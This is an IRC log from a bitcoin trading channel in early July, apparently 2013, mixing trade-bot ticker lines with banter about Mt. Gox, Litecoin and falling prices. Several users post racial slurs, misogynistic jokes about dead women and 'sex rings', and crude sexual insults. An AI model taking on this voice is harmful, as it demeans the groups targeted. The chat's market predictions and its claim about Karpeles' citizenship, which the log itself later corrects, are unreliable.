[TAT.ASICMINER] 2 @ 0.046051 = 0.0921 BTC [-] Jul 04 01:42:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.046051 BTC [-] Jul 04 01:42:28 can we use older digital currencies as a head start? Jul 04 01:42:29 wtf is that? another eurotrip ..trip? Jul 04 01:42:42 it's kinda funny that the average IQ on the forums seems to linearly correlate to the BTC/USD price Jul 04 01:43:01 you might be onto something there Jul 04 01:43:36 jurov: hah nah, just some retarded french tv folks randomly picking an eastern europe country to make fun of Jul 04 01:44:02 http://news.slashdot.org/story/13/07/03/1952228/mastercard-and-visa-start-banning-vpn-providers Jul 04 01:44:05 MasterCard and Visa Start Banning VPN Providers - Slashdot Jul 04 01:44:09 amurica fuck yeah Jul 04 01:44:28 lawsuits against V/MC gonna be funny Jul 04 01:45:03 next they'll start enforcing ssl export controsl Jul 04 01:45:04 [BTCTC] [AMC-PT] 4 @ 0.00195 = 0.0078 BTC [-] Jul 04 01:45:14 it's not random, it has actually a long history, even before hostel movies Jul 04 01:45:43 i didn't even see that hostel thing, where did it start ? Jul 04 01:46:26 so we are about to break 76, is bitcoin dead? Jul 04 01:46:28 most likely inspired by bratislava's main railway station Jul 04 01:46:37 [BTCTC] [ASICMINER-PT] 1 @ 4.665002 BTC [-] Jul 04 01:46:41 bitcoins for vpns is a decent business case Jul 04 01:46:42 bitcoin is already dead Jul 04 01:46:43 [BTCTC] [ASICMINER-PT] 7 @ 4.665001 = 32.655 BTC [-] Jul 04 01:47:15 so, you are giving out that dead stuff? i'm interested Jul 04 01:47:16 ;;bids 0 Jul 04 01:47:25 *giving away Jul 04 01:47:47 [BTCTC] [ASICMINER-PT] 1 @ 4.665001 BTC [-] Jul 04 01:47:54 There are currently 26136834 bitcoins demanded at or over 0.0 USD, worth 8845658.84561 USD in total. | Data vintage: 863.0582 seconds Jul 04 01:48:03 [BTCTC] [AMC-PT] 9 @ 0.0021 = 0.0189 BTC [+] Jul 04 01:48:05 here come the AM sales Jul 04 01:48:12 maybe i should give them a nudge Jul 04 01:48:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.04605 = 1.1513 BTC [-] Jul 04 01:48:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.04604 BTC [-] Jul 04 01:48:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.04601 BTC [-] Jul 04 01:48:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [-] Jul 04 01:48:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.046 = 0.23 BTC [-] Jul 04 01:48:37 [BTCTC] [TAT.ASICMINER] 25 @ 0.046 = 1.15 BTC [-] Jul 04 01:48:38 [BTCTC] [TAT.ASICMINER] 9 @ 0.045601 = 0.4104 BTC [-] Jul 04 01:48:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.0456 = 0.912 BTC [-] Jul 04 01:48:57 [BTCTC] [ASICMINER-PT] 7 @ 4.665001 = 32.655 BTC [-] Jul 04 01:49:01 assbot should learn to consolidate Jul 04 01:49:05 fucking spammer Jul 04 01:49:25 bitcoin is dead long live litecoin Jul 04 01:49:37 til gox lists it Jul 04 01:50:03 looks like youll have to go back to stocking shelves at walmart Jul 04 01:50:08 yep Jul 04 01:50:13 cuz thats what i do best Jul 04 01:50:23 demand for worthless pass thrus is going to plunge Jul 04 01:50:27 jurov: dead bitcoins and dead women have this in common that they have a price Jul 04 01:50:36 lol Jul 04 01:51:02 whereas live women can be had freely, are you implying? Jul 04 01:51:19 long live mpex Jul 04 01:51:35 live women can only be had temporarily Jul 04 01:51:39 dead women are forever Jul 04 01:51:44 lol Jul 04 01:51:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.046 BTC [+] Jul 04 01:51:53 who wants to have woman forever anyway Jul 04 01:51:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.045601 = 0.2736 BTC [-] Jul 04 01:52:00 jurov: you forget to account for the cost of hunting Jul 04 01:52:25 jurov: true Jul 04 01:52:28 opportunity cost too Jul 04 01:53:40 well... better return to those golden old times before suffrage Jul 04 01:53:54 let's do bethrothal of children, etc. Jul 04 01:54:11 poor jurov Jul 04 01:54:52 ? Jul 04 01:55:00 thought hed retire when bitcoin was 250 Jul 04 01:55:21 now hes back to catching gypsies and sending them to mircea's sex rings Jul 04 01:55:45 at least he's not the unpaid commentator to the event Jul 04 01:55:59 i thought nothing when it was 250 cuz i was away exactly at that time and had good time with non-btc friends Jul 04 01:56:03 [BTCTC] [ASICMINER-PT] 14 @ 4.665001 = 65.31 BTC [-] Jul 04 01:56:17 jurov you lie you have no none btc friends Jul 04 01:56:23 only problem was sorting out the mess with options after i cam back Jul 04 01:57:08 orly? Jul 04 01:57:12 which never really got sorted Jul 04 01:57:15 ;) Jul 04 01:58:01 oh, tyhat was only someone having huge expectations..of me being a knight in shiny armor Jul 04 01:58:11 http://buttcoin.org/butterfly-labs-mini-rig-is-a-huge-broken-unstable-piece-of-shit Jul 04 01:58:13 The Butterfly Labs Mini Rig is a huge, broken, unstable piece of shit. Jul 04 01:58:13 attacking gates of mordor..er.. mpex Jul 04 01:58:13 lol Jul 04 01:58:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.047 = 0.188 BTC [+] Jul 04 01:58:52 lol Jul 04 01:59:37 http://buttcoin.org/mt-gox-closing-all-us-accounts-in-48-hours Jul 04 01:59:38 Mt Gox closing all US accounts in 48 hours. - Buttcoin - The P2P crypto-currency for butts. Jul 04 01:59:50 as always bitcoinbust's story checks out Jul 04 02:01:15 so bitcoin rally then? Jul 04 02:02:34 this guy actually is tiberius isn't he. Jul 04 02:02:58 duh Jul 04 02:03:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00397 BTC [+] Jul 04 02:03:15 so much effort srsly. Jul 04 02:03:17 yes, tibby had too some run-ins with slovak food or w/e Jul 04 02:03:40 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.004375 = 0.0525 BTC [+] Jul 04 02:05:40 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 04 02:06:08 is btct down? Jul 04 02:06:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.046999 = 2.35 BTC [-] Jul 04 02:06:19 i think google dns is having issues Jul 04 02:06:26 do you use it arij? Jul 04 02:06:26 [BTCTC] [COGNITIVE] 1 @ 0.330001 BTC [-] Jul 04 02:06:30 btct.co up here Jul 04 02:06:32 yea Jul 04 02:06:34 ThickAsThieves: google dns is fine Jul 04 02:06:34 google Jul 04 02:06:37 oh Jul 04 02:06:38 hmm Jul 04 02:06:43 it just derped out for me Jul 04 02:06:46 ThickAsThieves: you mean the 8.8.8.8 ? Jul 04 02:06:58 i might be on opendns Jul 04 02:07:29 so was luke-jr an BFL employee Jul 04 02:07:48 a shill at the least Jul 04 02:08:01 he looked like a fking druggie Jul 04 02:08:13 [BTCTC] [TAT.ASICMINER] 12 @ 0.047499 = 0.57 BTC [+] Jul 04 02:08:14 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 04 02:08:14 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [-] Jul 04 02:08:16 probably paid him in packets of heroin Jul 04 02:08:18 http://www.bloomberg.com/video/seeing-huge-increase-in-bitcoin-customers-karpeles-xsmrZuQxQ2CIkPQoeeDJsA.html Jul 04 02:08:19 19:06] ThickAsThieves: you mean the 8.8.8.8 ? Yes Jul 04 02:08:23 Seeing Huge Increase in Bitcoin Customers: Karpeles: Video - Bloomberg Jul 04 02:08:37 ThickAsThieves: it looks perfectly fine from here Jul 04 02:08:43 hmm Jul 04 02:08:47 lol mircea Jul 04 02:08:50 [BTCTC] [BITVPS] 1 @ 0.0029 BTC [-] Jul 04 02:08:58 meanwhile the mtgox order book is 70% smaller today then in april Jul 04 02:09:06 that video really is when they died huh Jul 04 02:09:10 ;;bids 0 Jul 04 02:09:12 There are currently 26142642 bitcoins demanded at or over 0.0 USD, worth 9230548.4794 USD in total. | Data vintage: 0.0059 seconds Jul 04 02:09:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.047499 BTC [+] Jul 04 02:09:18 btcco was flakey a few minutes ago Jul 04 02:09:42 mircea_popescu: omfg, the journalist's face is almost uglier that karpeles' Jul 04 02:09:56 [BTCTC] [B.YABMC] 1 @ 0.006445 BTC [-] Jul 04 02:10:17 bitcoinbust: herion addict would be a giant step up from the real Luke-Jr Jul 04 02:10:19 i believe it Jul 04 02:10:27 i think the question here is whether we have one more crash to look forward to Jul 04 02:10:31 omfg, his accent Jul 04 02:10:53 my accent is probably worse. Jul 04 02:11:03 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC Jul 04 02:11:15 in japanese maybe Jul 04 02:11:47 lol nah, japanese is ezzy. kirimigikitikilikikitipilitiligigikiekisi Jul 04 02:11:48 anyway, you should repost this in a you rage you lose thread Jul 04 02:12:04 full disclosure : i lost Jul 04 02:12:06 this is years ago Jul 04 02:12:07 isnt karpeles a US citizen? Jul 04 02:12:18 he's a us citizen with a french accent living in japan Jul 04 02:12:32 lol Jul 04 02:12:33 just another way of saying aeronautic accident Jul 04 02:12:36 mircea_popescu: karpeles? a US citizen? Jul 04 02:12:44 only a bitcoiner would have such a profile Jul 04 02:12:46 when did that happen ? Jul 04 02:12:52 when his mommy delivered ? neh ? Jul 04 02:12:54 davout he was always a US citizen Jul 04 02:13:03 probably born on a US military base Jul 04 02:13:11 in france Jul 04 02:13:31 lolwut, source? Jul 04 02:13:42 google ya fucking jagoff Jul 04 02:14:18 like? Jul 04 02:14:22 ;;google jagoff Jul 04 02:14:23 Jagoff - Wikipedia, the free encyclopedia: ; Urban Dictionary: Jagoff: ; MOVE YA JAGOFF (Pittsburgh spoof of Maroon 5 "Moves Like ...: Jul 04 02:14:45 [BTCTC] [BITVPS] 9 @ 0.0029 = 0.0261 BTC [-] Jul 04 02:15:03 curious what their 19th judgement looks like Jul 04 02:15:06 two weeks... Jul 04 02:15:16 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003959 = 0.1188 BTC [-] Jul 04 02:15:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.046501 BTC [-] Jul 04 02:15:20 http://news.cnet.com/8301-17938_105-57592085-1/china-opens-worlds-largest-building-three-times-size-of-pentagon/ Jul 04 02:15:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.046501 BTC [-] Jul 04 02:15:25 China opens city-sized shopping mall, with fake sun | Crave - CNET Jul 04 02:15:31 includes artificial sun Jul 04 02:15:34 https://torrentfreak.com/mastercard-and-visa-start-banning-vpn-providers-130703/ Jul 04 02:15:39 Mastercard and Visa Start Banning VPN Providers | TorrentFreak Jul 04 02:15:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.0465 = 0.93 BTC [-] Jul 04 02:15:57 bitcoinbust: the forums does not qualify as "source" Jul 04 02:15:58 try to keep up tiberius I posted that 10 minutes ago Jul 04 02:16:18 [BTCTC] [TAT.ASICMINER] 16 @ 0.046 = 0.736 BTC [-] Jul 04 02:16:21 http://www.theverge.com/2013/7/3/4491108/microsoft-xbox-one-reputation-system-cordons-off-trolls Jul 04 02:16:23 Microsoft's Xbox One reputation system is built to make trolls play with trolls | The Verge Jul 04 02:16:31 [BTCTC] [ASICMINER-PT] 3 @ 4.665003 = 13.995 BTC [-] Jul 04 02:16:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003958 BTC [-] Jul 04 02:16:38 [BTCTC] [ASICMINER-PT] 1 @ 4.665002 BTC [-] Jul 04 02:16:43 [BTCTC] [ASICMINER-PT] 14 @ 4.665001 = 65.31 BTC [-] Jul 04 02:16:51 http://www.nytimes.com/2013/07/04/us/monitoring-of-snail-mail.html Jul 04 02:17:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0459 BTC [-] Jul 04 02:17:24 davout sooo why isn't he marc then Jul 04 02:17:39 [BTCTC] [TAT.VIRTUALMINE] 63 @ 0.003953 = 0.249 BTC [-] Jul 04 02:17:42 [BTCTC] [TAT.ASICMINER] 14 @ 0.0457 = 0.6398 BTC [-] Jul 04 02:17:49 [BTCTC] [ASICMINER-PT] 17 @ 4.665001 = 79.305 BTC [-] Jul 04 02:17:50 [BTCTC] [TAT.ASICMINER] 16 @ 0.046 = 0.736 BTC [+] Jul 04 02:17:52 mircea_popescu: god. tell me you copy-pasted that from the forums Jul 04 02:17:56 [BTCTC] [ASICMINER-PT] 2 @ 4.665 = 9.33 BTC [-] Jul 04 02:17:59 fuck me. Mark Marie Robert Karpeles, born 1985. french national. Jul 04 02:18:09 [BTCTC] [ASICMINER-PT] 15 @ 4.63 = 69.45 BTC [-] Jul 04 02:18:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.046 = 0.184 BTC [+] Jul 04 02:18:14 [BTCTC] [ASICMINER-PT] 1 @ 4.63 BTC [-] Jul 04 02:18:15 right you were. Jul 04 02:18:16 [BTCTC] [TAT.ASICMINER] 21 @ 0.0457 = 0.9597 BTC [-] Jul 04 02:18:17 [BTCTC] [ASICMINER-PT] 1 @ 4.6209 BTC [-] Jul 04 02:18:18 [BTCTC] [TAT.ASICMINER] 13 @ 0.045601 = 0.5928 BTC [-] Jul 04 02:18:24 [BTCTC] [ASICMINER-PT] 2 @ 4.6 = 9.2 BTC [-] Jul 04 02:18:43 [BTCTC] [ASICMINER-PT] 3 @ 4.6 = 13.8 BTC [-] Jul 04 02:18:44 common knowledge, it's like drugs. don't do it. Jul 04 02:18:50 [BTCTC] [ASICMINER-PT] 7 @ 4.7 = 32.9 BTC [+] Jul 04 02:18:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.0456 = 0.228 BTC [-] Jul 04 02:19:13 well in my defense : i didn't particularly care / just went by teh river. if it becomes a point i can easily have it researchyed for me. Jul 04 02:19:17 [BTCTC] [TAT.ASICMINER] 13 @ 0.045521 = 0.5918 BTC [-] Jul 04 02:19:20 so i claim drug immunitah! i'm only chippin'! Jul 04 02:19:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.045521 = 0.3186 BTC [-] Jul 04 02:19:27 :-) Jul 04 02:19:32 https://www.nytimes.com/2013/07/04/us/monitoring-of-snail-mail.html Jul 04 02:19:38 i was actually doing some research as we speak Jul 04 02:19:39 [BTCTC] [ASICMINER-PT] 2 @ 4.7 = 9.4 BTC [+] Jul 04 02:19:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.04552 BTC [-] Jul 04 02:19:49 [BTCTC] [TAT.ASICMINER] 45 @ 0.04552 = 2.0484 BTC [-] Jul 04 02:19:51 [BTCTC] [TAT.ASICMINER] 68 @ 0.04551 = 3.0947 BTC [-] Jul 04 02:20:06 i remember pulling the legal dox of macaraja in mid 2011 to research on his legal setup Jul 04 02:20:14 which i subsequently found to be a joke Jul 04 02:20:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.0445 = 0.356 BTC [-] Jul 04 02:20:26 i don't recall who that is. Jul 04 02:21:03 hah, you must be new here. macaraja was the french version of mutum sigillum Jul 04 02:21:09 a Jul 04 02:21:23 which i got quite curious about Jul 04 02:21:33 "The latest from MACARAJA (@Macaraja). MACARAJA develops softwares and sells sharewares." Jul 04 02:21:35 win. Jul 04 02:22:04 hi mircea Jul 04 02:22:33 mircea is a girl name Jul 04 02:22:49 romanian name Jul 04 02:23:29 highly doubt thats his real name Jul 04 02:24:35 just because some nutty us actress is using it doesn't mean it's a girls name. Jul 04 02:26:00 [BTCTC] [AMC-PT] 25 @ 0.0021 = 0.0525 BTC [+] Jul 04 02:27:00 you just happen to have a name and a taste for passive anal sex in common with some random american chick Jul 04 02:27:13 BLOG ABOUT IT ! Jul 04 02:27:29 ;;google mircea.mircea monroe. Jul 04 02:27:31 Mircea Monroe - Wikipedia, the free encyclopedia: ; Mircea Monroe - IMDb: ; Mircea Monroe (missmircea) on Twitter: Jul 04 02:27:36 aww! too famous for me. Jul 04 02:27:42 ;;google mircea.mircea monroe. trilema Jul 04 02:27:43 The Ethics of Letting a Lying Defendant Testify | Ethics Alarms: ; Index of philosophy articles (I–Q) - Wikipedia, the free encyclopedia: ; Lemondegala | o felie de viaţă: Jul 04 02:27:52 aww, too broken for the internets. Jul 04 02:28:06 she's cute Jul 04 02:28:12 http://trilema.com/2010/mircea-mircea-monroe/ there. years ago Jul 04 02:28:15 Mircea. Mircea Monroe. pe Trilema - Un blog de Mircea Popescu. Jul 04 02:28:17 I'd hit it Jul 04 02:28:27 but her name did make me think almost instantly to MM's Jul 04 02:28:32 well... she was cute five years ago. by now probably yet another cosmetic surgery rag doll Jul 04 02:28:45 haha nice Jul 04 02:28:55 she got nudes? Jul 04 02:29:00 i cant stand the middle-aged women on tv these days Jul 04 02:29:05 they all look like ducks Jul 04 02:29:06 you have this ability to retroactively blog about shit Jul 04 02:29:13 freaks Jul 04 02:29:29 myeah Jul 04 02:29:34 ThickAsThieves: worse, they all keep moving their lips Jul 04 02:29:41 needs moar nudes tbh Jul 04 02:29:56 s/nu/du/ ? Jul 04 02:29:58 so talk to her. Jul 04 02:30:17 [BTCTC] [BITVPS] 90 @ 0.0029 = 0.261 BTC [-] Jul 04 02:30:21 wut Jul 04 02:30:48 [BTCTC] [BITVPS] 100 @ 0.00295 = 0.295 BTC [+] Jul 04 02:31:44 [BTCTC] [BITVPS] 84 @ 0.002998 = 0.2518 BTC [+] Jul 04 02:32:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.046999 BTC [+] Jul 04 02:32:46 [BTCTC] [AMC-PT] 475 @ 0.00216 = 1.026 BTC [+] Jul 04 02:34:07 davout btw, why do you mark the "a" in penser a mm's to to in english ? it's of. Jul 04 02:34:31 mon mec a moi isn't lover to me, it's lover of mine innit ? Jul 04 02:34:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.046999 BTC [+] Jul 04 02:34:42 yes Jul 04 02:35:26 aller a hmm. ok. i just realised it's actually ambigous in zee french Jul 04 02:36:06 i would've actually said "about" had i re-read myself Jul 04 02:36:32 "thinking of" doesn't please my circuitry Jul 04 02:36:47 it's really the englisjh form tho Jul 04 02:36:54 [BTCTC] [BFMINES] 10 @ 0.004 = 0.04 BTC Jul 04 02:36:54 would that have been correct Jul 04 02:37:17 don't both work ? Jul 04 02:37:41 well for a foreigner yes. Jul 04 02:37:57 its bitcoingedon an you talk about grammar why whyyyyyyyy Jul 04 02:37:59 but otherwise it's "she's thinking of me" not about me, unless it's really some very theoretical abstract approach Jul 04 02:38:16 error4738 would you prefer we fiddled ? Jul 04 02:39:32 allright Jul 04 02:39:37 do the fiddle popescu Jul 04 02:39:49 [BTCTC] [ASICMINER-PT] 1 @ 4.600002 BTC [-] Jul 04 02:39:55 [BTCTC] [ASICMINER-PT] 1 @ 4.600001 BTC [-] Jul 04 02:40:00 [BTCTC] [ASICMINER-PT] 3 @ 4.6 = 13.8 BTC [-] Jul 04 02:40:10 [BTCTC] [ASICMINER-PT] 15 @ 4.561 = 68.415 BTC [-] Jul 04 02:40:24 i dont get it... c'est quoi la best traduction en francais *sry to ask in french Jul 04 02:40:38 trafiquer ? Jul 04 02:40:50 trafiquer dans quel sens ? Jul 04 02:40:55 ahahaha. win. Jul 04 02:40:58 that's true french right there. Jul 04 02:41:11 trafic de drogue ? trafic routier ? manigance ? Jul 04 02:41:26 ok : To move one's fingers or hands in a nervous fashion. Jul 04 02:41:44 http://www.comewatchme.com/80409/woman-pitbull-rot-tattoo-booty-twerkin-who-dogs-out-physics-class Jul 04 02:41:47 Woman With Pitbull & Rot Tattoo On Her Booty Twerkin To "Who Let The Dogs Out" In Physics Class Jul 04 02:41:49 it actually means complot ?! Jul 04 02:41:52 [BTCTC] [TAT.ASICMINER] 11 @ 0.046999 = 0.517 BTC [+] Jul 04 02:42:38 what the fuck Jul 04 02:42:45 MTGox API going haywire. Clark Moody struggling. MAybe this is the time MTGox is changing engine? Jul 04 02:42:59 yes. changing the engine Jul 04 02:43:01 for vodka Jul 04 02:43:06 lol Jul 04 02:43:07 no Jul 04 02:43:24 this is what happens when price plummets Jul 04 02:43:27 error4738 anyway, prolly fidget Jul 04 02:43:30 gox goes haywire Jul 04 02:43:33 Why are you so certain? They said two weeks two weeks ago. Jul 04 02:43:36 from all the gawkers Jul 04 02:43:44 ThickAsThieves because bitcoin is built to go up. Jul 04 02:43:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.046999 = 0.423 BTC [+] Jul 04 02:43:48 Yeah, but price has been dropping all day without issues. Jul 04 02:43:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.047 BTC [+] Jul 04 02:43:49 since when is 2 weeks 2 weeks? Jul 04 02:43:55 amd when iot goes down it messes wiff da maffs Jul 04 02:44:09 Also, I think they periodically mess with their API data on purpose to prevent people from pulling the full history via the API, though this shouldn't affect the websocket that clark moody/bitcoinity uses Jul 04 02:44:18 [BTCTC] [AMC-PT] 13 @ 0.00216 = 0.0281 BTC [+] Jul 04 02:44:45 That's my point, and if they actually got their shit together for once, now would be the exact time they said they would change engines. Jul 04 02:44:50 They want people to use the Google BigQuery for pulling the full history Jul 04 02:44:55 That'd be really nice, furuknap Jul 04 02:45:02 We can hope, can't we? Jul 04 02:45:35 no. you may not hope. Jul 04 02:45:36 now what. Jul 04 02:45:52 why would you EVER hope on gox? Jul 04 02:45:54 cmon now Jul 04 02:46:06 Really because I'm hoping they would implement Litecoins :-) Jul 04 02:46:14 why? Jul 04 02:46:20 Because I has LTC! Jul 04 02:46:24 ... Jul 04 02:46:40 LTC on Gox was just as much a shit idea as announcing it on Apr 1 Jul 04 02:46:42 [BTCTC] [DMS.MINING] 1 @ 0.0196 BTC [-] Jul 04 02:46:58 No joke, bro! Jul 04 02:47:01 My, oh my, aren't we the little ray of sunshine, then... Jul 04 02:47:03 [BTCTC] [AMC-PT] 1043 @ 0.002215 = 2.3102 BTC [+] Jul 04 02:47:09 i am indeed Jul 04 02:47:21 do you see the light yet? Jul 04 02:47:38 Nope, stil dark here. Jul 04 02:48:13 http://www.cryptocoincharts.info/period-charts.php?period=6-months&resolution=day&pair=ltc-usd&market=btc-e Jul 04 02:48:16 now ? Jul 04 02:48:17 LTC/USD 6-months charts from BTC-e Jul 04 02:48:45 heh Jul 04 02:48:56 so is it trailing btc/usd perfectly now? Jul 04 02:49:06 Now what? Jul 04 02:50:15 [BTCTC] [TAT.ASICMINER] 15 @ 0.047 = 0.705 BTC [+] Jul 04 02:51:05 TAT, no LTC on your bag ? Jul 04 02:51:11 http://www.youtube.com/watch?v=t89JF22B_fo&list=PL517059DD88091EB8&index=2 Jul 04 02:51:13 Top Gear Jeremy makes fun of Americans. - YouTube Jul 04 02:51:17 funny every single time Jul 04 02:51:20 i have a little LTC Jul 04 02:51:23 not much Jul 04 02:51:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.047 = 0.094 BTC [+] Jul 04 02:51:37 mostly only used it to by Deprived assets Jul 04 02:51:50 dont belive in "MtGox" effect ? Jul 04 02:51:53 sup niggers Jul 04 02:51:56 lol Jul 04 02:52:07 !seen jurov Jul 04 02:52:08 [BTCTC] [DMS.MINING] 7 @ 0.0205 = 0.1435 BTC [+] Jul 04 02:52:22 i dont believe gox really thought thru adding LTC Jul 04 02:52:26 [BTCTC] [TAT.ASICMINER] 22 @ 0.047499 = 1.045 BTC [+] Jul 04 02:52:27 jurov still around ? Jul 04 02:52:30 and dont see why they would anytime soon Jul 04 02:52:41 [BTCTC] [ASICMINER-PT] 3 @ 4.57 = 13.71 BTC [+] Jul 04 02:52:45 wanna bet on that ? ;) Jul 04 02:52:46 [BTCTC] [ASICMINER-PT] 6 @ 4.561 = 27.366 BTC [-] Jul 04 02:52:55 hmm Jul 04 02:53:08 is there a bitbet yet? Jul 04 02:53:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.047 = 0.141 BTC [-] Jul 04 02:53:23 [BTCTC] [BFMINES] 10 @ 0.004 = 0.04 BTC Jul 04 02:53:25 when did they say theyd add it most recently? Jul 04 02:53:30 put a bet up for that Jul 04 02:53:32 hi thickasthieves Jul 04 02:53:40 hi lover Jul 04 02:53:53 been awhile Jul 04 02:53:56 [BTCTC] [ASICMINER-PT] 1 @ 4.561 BTC [-] Jul 04 02:53:59 like 15m? Jul 04 02:53:59 20 june Jul 04 02:54:01 does jurov still run coinbr? Jul 04 02:54:13 yes Jul 04 02:54:21 20 june on facebook Jul 04 02:54:32 oh they already missed their date again? Jul 04 02:54:39 the hell happend to bitcoin? last i paid attention a few weeks ago it was like 140 Jul 04 02:54:43 Bugpoweder what did you do?! Jul 04 02:54:51 btc/usd is broke! Jul 04 02:54:56 [BTCTC] [BASIC-MINING] 1 @ 0.166401 BTC [-] Jul 04 02:54:57 I didn't do anything Jul 04 02:55:00 cause I couldn't Jul 04 02:55:03 [BTCTC] [TAT.ASICMINER] 3 @ 0.04701 = 0.141 BTC [+] Jul 04 02:55:06 cause I'm not verified Jul 04 02:55:07 hi bugpowder Jul 04 02:55:08 bitcoin is dead Jul 04 02:55:18 long time Jul 04 02:55:18 SELL! Jul 04 02:55:19 tib the jig is up Jul 04 02:55:24 rebut in november Jul 04 02:55:26 we knew it was you Jul 04 02:55:30 tib i though u were banned Jul 04 02:55:41 what happend to bitcoin last time i was here it was like 150 Jul 04 02:55:51 is mircea still around ? Jul 04 02:55:58 last time you were here we kicked you out Jul 04 02:56:06 if you wanna be specific Jul 04 02:56:10 looks like you kicked the price out with me Jul 04 02:56:28 its fucking over Jul 04 02:56:33 you think? Jul 04 02:56:37 well Jul 04 02:56:40 you going all cash Bug? Jul 04 02:56:45 I wish I could Jul 04 02:56:51 50% decline in fking a few weeks Jul 04 02:56:56 cuz cash isnt a real thing in gox Jul 04 02:57:03 [BTCTC] [ASICMINER-PT] 2 @ 4.689982 = 9.38 BTC [+] Jul 04 02:57:03 how do you cash out 250? Jul 04 02:57:07 [BTCTC] [ASICMINER-PT] 3 @ 4.689984 = 14.07 BTC [+] Jul 04 02:57:11 with gox gone? Jul 04 02:57:12 tiberiusxvi!*@* added to ignore list. Jul 04 02:57:17 campbx Jul 04 02:57:18 lol Jul 04 02:57:22 [BTCTC] [AMC-PT] 30 @ 0.00194 = 0.0582 BTC [-] Jul 04 02:57:24 no Jul 04 02:57:24 coinbase aint bad Jul 04 02:57:31 but takes time to set up Jul 04 02:57:32 coin base can do 1k Jul 04 02:57:37 not 250 Jul 04 02:57:42 ah Jul 04 02:57:43 regulators Jul 04 02:58:03 basically its over till everyone says bitcoin is dead Jul 04 02:58:04 then buy Jul 04 02:58:07 stfu already tib Jul 04 02:58:09 just like a sait Jul 04 02:58:11 [BTCTC] [AMC-PT] 5 @ 0.00194 = 0.0097 BTC [-] Jul 04 02:58:16 just like last time Jul 04 02:58:20 chart is the fucking same Jul 04 02:58:38 [BTCTC] [ASICMINER-PT] 1 @ 4.562001 BTC [-] Jul 04 02:58:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.046002 = 0.322 BTC [-] Jul 04 02:58:48 there will probably be some bounces on the way down Jul 04 02:58:51 what kind of bottom are you thinking? Jul 04 02:58:54 15 Jul 04 02:58:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.047 = 0.47 BTC [+] Jul 04 02:58:58 nah Jul 04 02:59:03 no way Jul 04 02:59:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.047 = 0.564 BTC [+] Jul 04 02:59:08 no high? Jul 04 02:59:11 too Jul 04 02:59:16 lol Jul 04 02:59:23 1 is too low Jul 04 02:59:28 yes Jul 04 02:59:31 i think breaking 60 will be tough Jul 04 02:59:39 gambling sites are fluorishing Jul 04 02:59:57 fuck gox Jul 04 03:00:00 I'm an idiot Jul 04 03:00:05 shoulda got trusted Jul 04 03:00:10 lazy Jul 04 03:00:15 you were saying that mos ago Jul 04 03:00:22 [BTCTC] [TAT.ASICMINER] 7 @ 0.047499 = 0.3325 BTC [+] Jul 04 03:00:25 mr. bigg got out I think Jul 04 03:00:32 you can always buy Amazon Gift cArds! Jul 04 03:00:35 $2k each Jul 04 03:00:46 well Jul 04 03:00:50 gox died Jul 04 03:00:57 what can I do Jul 04 03:01:03 bitcoin-otc Jul 04 03:01:05 yay tiberiusxvi is back Jul 04 03:01:08 after all this time Jul 04 03:01:15 then ebay the gift cards or craigslist Jul 04 03:01:26 [BTCTC] [ASICMINER-PT] 1 @ 4.562004 BTC [+] Jul 04 03:01:28 I'm selling about 3k a day on localbitcoins Jul 04 03:01:35 --- JimFromBronx [~3246306d@204.155.152.124] Jul 04 03:01:37 --- bitcoinbust [~3246306d@204.155.152.124] Jul 04 03:01:44 --- tiberiusxvi [~3246306d@static-71-174-73-11.bstnma.fios.verizon.net] Jul 04 03:01:47 <--- called it Jul 04 03:01:56 hahah Jul 04 03:01:56 without even checking the stats Jul 04 03:02:14 dc Jul 04 03:02:40 [BTCTC] [TAT.ASICMINER] 22 @ 0.046002 = 1.012 BTC [-] Jul 04 03:02:57 troll harder bro Jul 04 03:03:08 wanna buy some coins? Jul 04 03:03:15 $70/coin Jul 04 03:03:25 you know I actually ama nigger right? Jul 04 03:03:26 minimum $50k Jul 04 03:03:30 lol Jul 04 03:03:35 a nigger that can buy and sell your broke ass Jul 04 03:04:23 I did Jul 04 03:04:26 I sold at 130 Jul 04 03:04:28 all cahs Jul 04 03:04:30 cash Jul 04 03:04:33 couldn't get it out Jul 04 03:04:35 in time Jul 04 03:04:49 had to rebut at 112 to move the coins off after dwolla seziure Jul 04 03:04:51 silk road won't last Jul 04 03:04:59 Atlantis! Jul 04 03:05:11 with ad campagins Jul 04 03:05:16 that were on drudge Jul 04 03:05:37 OH SHIT Jul 04 03:05:44 i mean http://www.nytimes.com/2013/07/04/us/monitoring-of-snail-mail.html Jul 04 03:05:46 MattFoster just blew up his account Jul 04 03:05:49 and such Jul 04 